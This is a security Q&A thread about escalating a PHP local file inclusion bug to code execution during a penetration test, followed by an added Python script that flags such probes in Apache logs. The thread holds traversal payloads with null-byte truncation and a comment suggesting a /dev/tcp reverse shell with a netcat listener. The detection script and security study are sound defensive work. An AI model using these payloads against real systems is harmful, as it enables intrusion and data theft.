
During a penetration test, I came across an endpoint which lets me include local files, and I can read /etc/passwd. However, I don't have permissions to read /proc/self/environ and /etc/shadow.

The endpoint looks like:

http://xxxxx/directory/file.php?classes_dir=../../../../var/log/messages%00 (Apache webserver running php on Ubuntu)

The payload above returns the following error message:

Warning: require_once(../../../../var/log/messages) [function.require-once]: failed to open stream: Permission denied in /var/www/classes/file.php on line 4

I can't read log files because I get a permission denied message when I try accessing /var/log/messages (because of which log poisoning seems unlikely in this case).

The answer to this question suggests looking into SSH logs, which aren't readable either.

Any ideas how this can be leveraged to RCE?

ramailo sathi
  • Another thing to try is `/dev/tcp/[your IP]/[listening port]`. Also try pulling down other PHP files and look for other vulnerabilities there. – h4ckNinja May 15 '16 at 22:19
  • You mean something like `http://xxxxx/file.php?classes_dir=../../../../dev/tcp/10.x.x.x/9999%00` and listening for reverse shell `nc -nlvp 9999` ? (That didn't help) – ramailo sathi May 15 '16 at 22:34
  • Yes. It doesn't always work. It's just one of the things I try. – h4ckNinja May 15 '16 at 23:53
  • related: [How to hack linux via Local File Inclusion vulnerability?](https://security.stackexchange.com/questions/20004/how-to-hack-linux-via-local-file-inclusion-vulnerability). – tim May 16 '16 at 11:34
  • I have this same problem in a pentest. Running an old CentOS 5 (Final) with Apache 2.2.3 and PHP 5.1.6 – Dusty Boshoff Jun 09 '16 at 13:00
  • Did you ever try reading the PHP files themselves using base64 encoding? – Adetutu Jun 19 '17 at 19:43
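From the defender's side, the requests in this question leave a distinctive shape in the Apache access log: a directory-traversal value, a `%00` truncation byte, and references to paths such as /var/log or /dev/tcp. The script below is an added example (not code from the question or its comments) that scans constructed access-log lines for exactly those markers; the IP addresses and log lines are made up.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample Apache access-log lines (combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [15/May/2016:22:10:01 +0000] "GET /directory/file.php?classes_dir=../../../../var/log/messages%00 HTTP/1.1" 200 512 "-" "curl/7.47"
203.0.113.5 - - [15/May/2016:22:34:10 +0000] "GET /directory/file.php?classes_dir=../../../../dev/tcp/10.0.0.1/9999%00 HTTP/1.1" 200 512 "-" "curl/7.47"
198.51.100.7 - - [15/May/2016:22:40:00 +0000] "GET /directory/file.php?classes_dir=core HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Paths that show up in the inclusion attempts discussed in this question.
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/proc/self/environ", "/var/log/", "/dev/tcp/")


def classify_value(raw_value: str) -> list:
    """Return the reasons a raw (still percent-encoded) query value looks like a file-inclusion probe."""
    decoded = unquote(raw_value)
    reasons = []
    if "../" in decoded or "..\\" in decoded:
        reasons.append("traversal")
    if "\x00" in decoded:  # %00 is used to cut off a suffix the script appends
        reasons.append("null-byte")
    for path in SENSITIVE_PATHS:
        if path in decoded:
            reasons.append("sensitive-path:" + path)
    return reasons


def scan_access_log(text: str) -> list:
    """Scan access-log text and return one hit per suspicious query parameter."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # Split by hand so the value stays percent-encoded until classify_value decodes it.
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")
            reasons = classify_value(raw)
            if reasons:
                # Status is recorded but not used as a signal: PHP returned its
                # "failed to open stream" warning with a normal 200 in this question.
                hits.append({"ip": m.group("ip"), "param": unquote(name),
                             "status": int(m.group("status")), "reasons": reasons})
    return hits
```

Run `scan_access_log` over a real log to get one record per flagged parameter; the third sample line, a plain `classes_dir=core`, produces no hit.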

0 Answers